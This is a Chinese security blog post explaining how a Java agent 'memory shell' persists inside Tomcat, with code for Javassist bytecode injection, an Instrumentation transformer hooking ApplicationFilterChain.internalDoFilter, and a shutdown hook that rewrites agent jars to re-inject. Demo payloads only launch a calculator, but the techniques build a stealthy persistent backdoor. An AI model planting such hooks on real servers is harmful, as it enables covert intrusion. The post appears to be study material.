Java内存shell：javaagent

2020-09-27

rebeyond 师傅在参考【1】中提出利用javaagent 永久注入tomcat进程的方案，有几个重要的技术点

javaagent技术
javassist技术
tomcat ApplicationFilterChain.internalDoFilter方法
ShutdownHook 钩子

javassist技术

Java 字节码以二进制的形式存储在 .class 文件中，每一个 .class 文件包含一个 Java 类或接口。Javaassist 就是一个用来处理 Java 字节码的类库。它可以在一个已经编译好的类中添加新的方法，或者是修改已有的方法，并且不需要对字节码方面有深入的了解。同时也可以去生成一个新的类对象，通过完全手动的方式。

javassist 相关文档可以参考【2】和【3】，以简单的javassist demo
为例

Demo

目录结构

1 2	├── ModifyTarget.java └── Target.java

其中Target为Demo

public class Target {
    public void hello(){
        System.out.println("hello");
    }
    public static void main(String[] var0) throws Exception {
        Target a = new Target();
        a.hello();
    }
}

ModifyTarget功能为利用javassist动态更改Target.class，添加一段静态代码段

public void testClassPool() throws CannotCompileException, NotFoundException, IOException
{
    String command = "open -a calculator.app";

    ClassPool pool = ClassPool.getDefault();
    pool.insertClassPath(new ClassClassPath(org.m0d9.sec.JavassistDemo.Target.class));
    CtClass cc = pool.get(org.m0d9.sec.JavassistDemo.Target.class.getName());
    System.out.println(org.m0d9.sec.JavassistDemo.Target.class.getName());

    cc.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") +"\");");
    //加入关键执行代码，生成一个静态函数。

    String newClassNameString = "angelwhu.Pwner" + System.nanoTime();
    cc.setName(newClassNameString);
    // 写文件
    cc.writeFile();
}

upload successful

但是仅仅改动class还不够，如何替换掉正在运行的Target类呢？

Java Instrumentation

java Instrumentation指的是可以用独立于应用程序之外的代理（agent）程序来监测和协助运行在JVM上的应用程序。这种监测和协助包括但不限于获取JVM运行时状态，替换和修改类定义等。简单一句话概括下：Java Instrumentation可以在JVM启动后，动态修改已加载或者未加载的类，包括类的属性、方法。

Demo

目录结构

1	└── AgentMainTest.java

其中AgentMainTest为Demo，agentmain为主函数

public class AgentMainTest {
    public static void premain(String agentArgs, Instrumentation instrumentation) {
        instrumentation.addTransformer(new DefineTransformer(), true);
    }

    static class DefineTransformer implements ClassFileTransformer {
        @Override
        public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
            System.out.println("premain load Class:" + className);
            return classfileBuffer;
        }
    }
}

打包为jar需要注意，必须指定Agent-Class:为目标类，比如rebeyond师傅的memshell

Agent-Class:net.rebeyond.memshell.Agent

主要的功能逻辑在自定义Transformer 上，Transformer提供transform接口，输入可以是各种类，如果需要修改该类，改动返回新类的bytes即可

如下

public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
    if ("org/m0d9/sec/JavassistDemo/Target".equals(className)) {
        try {
            ClassPool cp = ClassPool.getDefault();
            ClassClassPath classPath = new ClassClassPath(classBeingRedefined);  //get current class's classpath
            cp.insertClassPath(classPath);  //add the classpath to classpool
            CtClass cc = cp.get("org.m0d9.sec.JavassistDemo.Target");
            CtMethod m = cc.getDeclaredMethod("internalDoFilter");
            m.addLocalVariable("elapsedTime", CtClass.longType);
            m.insertBefore("System.out.println(\"called\");Runtime.getRuntime().exec(\"open -a calculator.app\");");
            System.out.println("inject code done");
            byte[] byteCode = cc.toBytecode();
            cc.detach();
            return byteCode;
        } catch (Exception ex) {
            ex.printStackTrace();
            System.out.println("error:::::"+ex.getMessage());
        }
    }
    return null;
}

打包为agent.jar

1	> java -javaagent:/Users/mody/study/java/MemShell/JavassistDemo/target/JavassistDemo-1.0-SNAPSHOT.jar Target

可以成功在hello函数中插入弹出计算器

tomcat internalDoFilter

前文servlet中有提及tomcat http请求的调用链

at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:198)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:493)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:140)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:87)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:342)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:800)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:806)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1498)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:745)

有了以上的基础知识，将Target类替换为internalDoFilter类即可

在internalDoFilter中插入的payload改为evil code

ShutdownHook

JDK提供了Java.Runtime.addShutdownHook(Thread hook)方法，可以注册一个JVM关闭的钩子，这个钩子可以在一下几种场景中被调用：

程序正常退出
使用System.exit()
终端使用Ctrl+C触发的中断
系统关闭
OutOfMemory宕机
使用Kill pid命令干掉进程（注：在使用kill -9 pid时，是不会被调用的）

Thread t = new Thread() {
	public void run() {
		try {
			writeFiles("inject.jar", Agent.injectFileBytes);
			writeFiles("agent.jar", Agent.agentFileBytes);
			startInject();
		} catch (Exception e) {

		}
	}
};
t.setName("shutdown Thread");
Runtime.getRuntime().addShutdownHook(t);

小结

本节将rebeyond 师傅首发的agent类型java内存马拆为几个关键技术点，简单的分别作了介绍，其实前两个javassist/javaagent应该还有更多的知识点。

愈发觉得java安全就像堆积木

感叹一声学海无涯